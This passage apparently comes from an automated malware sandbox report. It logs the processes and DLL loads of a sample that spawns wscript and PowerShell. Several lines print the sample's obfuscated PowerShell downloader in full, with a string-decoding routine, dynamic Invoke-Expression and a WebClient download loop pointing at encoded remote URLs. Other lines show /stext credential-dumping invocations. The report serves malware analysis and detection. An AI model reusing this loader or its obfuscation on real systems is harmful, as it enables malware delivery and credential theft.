bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" Jump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeProcess created: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\zvvuwrolfaxlvl"Jump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeProcess created: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\kpjewkzmtipqfrcbhk"Jump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeProcess created: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\mroxxckghqhciyqfqvohn"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptnet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: pstorec.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: pstorec.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
